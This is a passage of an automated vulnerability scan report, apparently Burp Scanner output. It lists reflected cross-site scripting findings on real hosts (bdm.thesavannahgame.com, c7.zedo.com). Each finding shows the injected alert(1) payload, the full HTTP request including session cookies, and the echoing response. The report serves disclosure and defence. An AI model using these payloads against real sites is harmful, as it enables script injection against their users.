Date: Mon, 12 Sep 2011 12:50:36 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny13 with Suhosin-Patch mod_wsgi/2.5 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
Vary: Authorization,Accept-Encoding,*
Content-Length: 22597
Connection: keep-alive

jQuery16204978716284967959_1315849731747c780e<script>alert(1)</script>f8f059caaeb({
"content": [
[
{
"end_user_description": "Learn about SavannahNow.com!",
"read_only": 0,
"modified_timestamp": 1313094859,

...[SNIP]...

2.21. http://bdm.thesavannahgame.com/api/publisher/c169f364e6d74a0cb948f3d60dc5ef19/proxy/named_transaction_group/657843/execute/1B3C6937-8DDC-4B7E-95C5-7878A957141E [REST URL parameter 8]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bdm.thesavannahgame.com
Path:   /api/publisher/c169f364e6d74a0cb948f3d60dc5ef19/proxy/named_transaction_group/657843/execute/1B3C6937-8DDC-4B7E-95C5-7878A957141E

Issue detail

The value of REST URL parameter 8 is copied into the HTML document as plain text between tags. The payload 239ba<img%20src%3da%20onerror%3dalert(1)>b848b762356 was submitted in the REST URL parameter 8. This input was echoed as 239ba<img src=a onerror=alert(1)>b848b762356 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /api/publisher/c169f364e6d74a0cb948f3d60dc5ef19/proxy/named_transaction_group/657843/execute/1B3C6937-8DDC-4B7E-95C5-7878A957141E239ba<img%20src%3da%20onerror%3dalert(1)>b848b762356?verbosity=9&non_secure=1&method=POST&callback=jQuery16204978716284967959_1315849731750&$amount=1&_=1315849743849 HTTP/1.1
Host: bdm.thesavannahgame.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/javascript
Date: Mon, 12 Sep 2011 12:51:11 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny13 with Suhosin-Patch mod_wsgi/2.5 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
Vary: Authorization,Accept-Encoding,*
Content-Length: 6912
Connection: keep-alive

jQuery16204978716284967959_1315849731750({
"content": [
{
"transaction_group_id": "e4585ae6dd3d11e09e70a1d588d6b83a",
"end_user": {
"read_only": 0,

...[SNIP]...
"end_user_title": "Checkin-SavannahNow"
}
],
"created_timestamp": 1315831871,
"end_user_login": "1B3C6937-8DDC-4B7E-95C5-7878A957141E239ba<img src=a onerror=alert(1)>b848b762356",
"level_summaries": [
{
"end_user_description": "You've earned Savannah Bucks just for visiting this page! Log in to keep your Bucks and re
...[SNIP]...

2.22. http://bdm.thesavannahgame.com/api/publisher/c169f364e6d74a0cb948f3d60dc5ef19/proxy/named_transaction_group/657843/execute/1B3C6937-8DDC-4B7E-95C5-7878A957141E [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bdm.thesavannahgame.com
Path:   /api/publisher/c169f364e6d74a0cb948f3d60dc5ef19/proxy/named_transaction_group/657843/execute/1B3C6937-8DDC-4B7E-95C5-7878A957141E

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 448ee<script>alert(1)</script>ac7a6816012 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/publisher/c169f364e6d74a0cb948f3d60dc5ef19/proxy/named_transaction_group/657843/execute/1B3C6937-8DDC-4B7E-95C5-7878A957141E?verbosity=9&non_secure=1&method=POST&callback=jQuery16204978716284967959_1315849731750448ee<script>alert(1)</script>ac7a6816012&$amount=1&_=1315849743849 HTTP/1.1
Host: bdm.thesavannahgame.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/javascript
Date: Mon, 12 Sep 2011 12:50:49 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny13 with Suhosin-Patch mod_wsgi/2.5 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
Vary: Authorization,Accept-Encoding,*
Content-Length: 457
Connection: keep-alive

jQuery16204978716284967959_1315849731750448ee<script>alert(1)</script>ac7a6816012({
"content": "3",
"headers": {
"Content-Type": [
"text/html; charset=utf-8"
],
"Vary": [
"Authorization"
],
"BDM-Reason-Phrase":
...[SNIP]...

2.23. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js [$ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8e412'%3balert(1)//85a26cf6ed2 was submitted in the $ parameter. This input was echoed as 8e412';alert(1)//85a26cf6ed2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-504/c5/jsc/fm.js?c=7038/1668/1&a=0&f=&n=305&r=13&d=15&q=&$=8e412'%3balert(1)//85a26cf6ed2&s=608&z=0.2381083215586841 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; FFMChanCap=2457780B305,825#722607:767,4#789954|0,1#0,24:0,1#0,24; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24; FFgeo=5386156

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 631
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:8e412';alert(1)//85a26cf6ed2,746f2';expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,7038,15:305,7040,15:305,7038,151a0a560b58e80ec1adb4033a;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=3:8:None;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFSkp=305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:;expires=Tue, 13 Sep 2011 05:00:00 GMT;path=/;domain=.zedo.com;
ETag: "8710bb37-8952-4aa4e77af70c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=140
Expires: Mon, 12 Sep 2011 12:51:03 GMT
Date: Mon, 12 Sep 2011 12:48:43 GMT
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=608;var zzPat='8e412';alert(1)//85a26cf6ed2,746f2'';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=8e412';alert(1)//85a26cf6ed2,746f2';z="+Math.random();}

if(zzuid=='unknown')zzuid='k5xiThcyanucBq9IXvhSGSz5~090311'
...[SNIP]...

2.24. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js [$ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload feb91"%3balert(1)//bc21aa44290 was submitted in the $ parameter. This input was echoed as feb91";alert(1)//bc21aa44290 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-504/c5/jsc/fm.js?c=7038/1668/1&a=0&f=&n=305&r=13&d=15&q=&$=feb91"%3balert(1)//bc21aa44290&s=608&z=0.2381083215586841 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; FFMChanCap=2457780B305,825#722607:767,4#789954|0,1#0,24:0,1#0,24; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24; FFgeo=5386156

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:feb91";alert(1)//bc21aa44290,c46b4";expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,7038,15:305,7040,15:305,7038,151a0a560b58e80ec1adb4033a;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1:8:None;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFMCap=2457900B1185,234056,234851,234925:933,196008:826,110235,110236:305,232825,235949|0,1#0,24:0,1#0,24:0,1#0,24:0,10#0,24:0,10#0,24:0,10#0,24:0,14#0,120:0,10#0,24;expires=Wed, 12 Oct 2011 12:48:43 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFSkp=305,7038,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:;expires=Tue, 13 Sep 2011 05:00:00 GMT;path=/;domain=.zedo.com;
ETag: "8710bb37-8952-4aa4e77af70c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=140
Expires: Mon, 12 Sep 2011 12:51:03 GMT
Date: Mon, 12 Sep 2011 12:48:43 GMT
Content-Length: 6383
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=608;var zzPat='feb91";alert(1)//bc21aa44290,c46b4"';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=feb91";alert(1)//bc21aa44290,c46b4";z="+Math.random();}

if(zzuid=='unknown')zzuid='k5xiThcyanucBq9IXvhSGSz5~090311';

var zzhasAd=undefined;


                                                                                                           
...[SNIP]...

2.25. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 290ab'%3balert(1)//ed469f36d1b was submitted in the q parameter. This input was echoed as 290ab';alert(1)//ed469f36d1b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-504/c5/jsc/fm.js?c=7038/1668/1&a=0&f=&n=305&r=13&d=15&q=290ab'%3balert(1)//ed469f36d1b&$=&s=608&z=0.2381083215586841 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; FFMChanCap=2457780B305,825#722607:767,4#789954|0,1#0,24:0,1#0,24; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24; FFgeo=5386156

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 614
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:1a0a560b5ac81252e9141598,1a0a560b9425736c82ba903c,1a0a560bbbeb671a3b382570;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,7038,15:305,7040,15:933,56,15:826,622,14:1545,8,14:826,622,9:1545,8,9;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=7:4:1:0:0:0:0;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFSkp=305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:;expires=Tue, 13 Sep 2011 05:00:00 GMT;path=/;domain=.zedo.com;
ETag: "8710bb37-8952-4aa4e77af70c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=143
Expires: Mon, 12 Sep 2011 12:51:03 GMT
Date: Mon, 12 Sep 2011 12:48:40 GMT
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=608;var zzPat='290ab';alert(1)//ed469f36d1b,1a0a560b5ac81252e9141598,1a0a560b9425736c82ba903c,1a0a560bbbeb671a3b382570';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=290ab';alert(1)//ed469f36d1b,1a0a560b5ac81252e91
...[SNIP]...

2.26. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7baf9"%3balert(1)//41b4507dc6c was submitted in the q parameter. This input was echoed as 7baf9";alert(1)//41b4507dc6c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-504/c5/jsc/fm.js?c=7038/1668/1&a=0&f=&n=305&r=13&d=15&q=7baf9"%3balert(1)//41b4507dc6c&$=&s=608&z=0.2381083215586841 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; FFMChanCap=2457780B305,825#722607:767,4#789954|0,1#0,24:0,1#0,24; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24; FFgeo=5386156

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 614
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:1a0a560b5ac81252e9141598,1a0a560b9425736c82ba903c,1a0a560bbbeb671a3b382570;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,7038,15:305,7040,15:933,56,15:826,622,14:1545,8,14:826,622,9:1545,8,9;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=5:4:1:0:0:0:0;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFSkp=305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:;expires=Tue, 13 Sep 2011 05:00:00 GMT;path=/;domain=.zedo.com;
ETag: "8710bb37-8952-4aa4e77af70c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=143
Expires: Mon, 12 Sep 2011 12:51:03 GMT
Date: Mon, 12 Sep 2011 12:48:40 GMT
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=608;var zzPat='7baf9";alert(1)//41b4507dc6c,1a0a560b5ac81252e9141598,1a0a560b9425736c82ba903c,1a0a560bbbeb671a3b382570';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=7baf9";alert(1)//41b4507dc6c,1a0a560b5ac81252e9141598,1a0a560b9425736c82ba903c,1a0a560bbbeb671a3b382570;z="+Math.random();}

if(zzuid=='unknown')zzuid='k5xiThcyanucBq9IXvhSGSz5~090311';

var zzhasAd=undefined;



...[SNIP]...

2.27. http://c7.zedo.com/bar/v16-504/c5/jsc/fmr.js [$ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fmr.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8f500"%3balert(1)//a377cf4d1f4 was submitted in the $ parameter. This input was echoed as 8f500";alert(1)//a377cf4d1f4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-504/c5/jsc/fmr.js?c=7038/1668/1&a=0&f=&n=305&r=13&d=15&q=&$=8f500"%3balert(1)//a377cf4d1f4&s=608&z=0.2381083215586841 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; FFMChanCap=2457780B305,825#722607:767,4#789954|0,1#0,24:0,1#0,24; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24; FFgeo=5386156; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 478
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:8f500";alert(1)//a377cf4d1f4,21990";expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,7038,15:305,7040,15:305,7038,151a0a560b58e80ec1adb4033a;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=4:8:None;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFSkp=305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:;expires=Tue, 13 Sep 2011 05:00:00 GMT;path=/;domain=.zedo.com;
ETag: "cff199-8747-4aa4e7838c500"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=139
Expires: Mon, 12 Sep 2011 12:51:03 GMT
Date: Mon, 12 Sep 2011 12:48:44 GMT
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=608;var zzPat='8f500";alert(1)//a377cf4d1f4,21990"';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=8f500";alert(1)//a377cf4d1f4,21990";z="+Math.random();}

if(zzuid=='unknown')zzuid='k5xiThcyanucBq9IXvhSGSz5~090311';

var zzhasAd=undefined;


               

2.28. http://c7.zedo.com/bar/v16-504/c5/jsc/fmr.js [$ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fmr.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 349bc'%3balert(1)//f49a54755fd was submitted in the $ parameter. This input was echoed as 349bc';alert(1)//f49a54755fd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-504/c5/jsc/fmr.js?c=7038/1668/1&a=0&f=&n=305&r=13&d=15&q=&$=349bc'%3balert(1)//f49a54755fd&s=608&z=0.2381083215586841 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; FFMChanCap=2457780B305,825#722607:767,4#789954|0,1#0,24:0,1#0,24; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24; FFgeo=5386156; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 478
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:349bc';alert(1)//f49a54755fd,e304a';expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,7038,15:305,7040,15:305,7038,151a0a560b58e80ec1adb4033a;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=6:8:None;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFSkp=305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:;expires=Tue, 13 Sep 2011 05:00:00 GMT;path=/;domain=.zedo.com;
ETag: "cff199-8747-4aa4e7838c500"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=139
Expires: Mon, 12 Sep 2011 12:51:03 GMT
Date: Mon, 12 Sep 2011 12:48:44 GMT
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=608;var zzPat='349bc';alert(1)//f49a54755fd,e304a'';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=349bc';alert(1)//f49a54755fd,e304a';z="+Math.random();}

if(zzuid=='unknown')zzuid='k5xiThcyanucBq9IXvhSGSz5~090311'
...[SNIP]...

2.29. http://c7.zedo.com/bar/v16-504/c5/jsc/fmr.js [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fmr.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b9b1f'%3balert(1)//4f2061d893a was submitted in the q parameter. This input was echoed as b9b1f';alert(1)//4f2061d893a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-504/c5/jsc/fmr.js?c=7038/1668/1&a=0&f=&n=305&r=13&d=15&q=b9b1f'%3balert(1)//4f2061d893a&$=&s=608&z=0.2381083215586841 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
